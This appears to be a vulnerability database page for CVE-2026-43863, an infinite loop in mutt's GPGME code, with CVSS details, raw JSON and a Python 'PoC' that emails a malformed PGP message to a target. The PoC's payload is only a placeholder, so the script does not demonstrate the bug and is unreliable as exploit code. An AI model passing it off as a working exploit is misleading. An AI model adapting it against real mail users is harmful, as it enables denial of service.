Security Vulnerability Report
中文
CVE-2026-43863 CVSS 3.7 LOW

CVE-2026-43863

Published: 2026-05-04 07:16:01
Last Modified: 2026-05-05 19:44:43

Description

mutt before 2.3.2 has an infinite loop in data_object_to_stream in crypt-gpgme.c.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Mutt < 2.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText # PoC for CVE-2026-43863 # This script demonstrates sending a malformed email that triggers the infinite loop. # Adjust the payload based on specific GPG structure analysis. def send_trigger(target_email, smtp_server): msg = MIMEMultipart() msg['Subject'] = 'CVE-2026-43863 Trigger' msg['From'] = 'attacker@local' msg['To'] = target_email # Malformed PGP data structure intended to hit data_object_to_stream # Specific byte sequence required to trigger the condition in crypt-gpgme.c payload = """-----BEGIN PGP MESSAGE----- Version: GnuPG v1 [Malformed Stream Data] -----END PGP MESSAGE-----""" msg.attach(MIMEText(payload, _subtype='plain')) with smtplib.SMTP(smtp_server) as server: server.send_message(msg) # send_trigger('[email protected]', 'localhost')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43863", "sourceIdentifier": "[email protected]", "published": "2026-05-04T07:16:01.033", "lastModified": "2026-05-05T19:44:42.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "mutt before 2.3.2 has an infinite loop in data_object_to_stream in crypt-gpgme.c."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-253"}]}], "references": [{"url": "https://github.com/muttmua/mutt/commit/fdc04a171777327218a1e78db504926c388b48c4", "source": "[email protected]"}]}}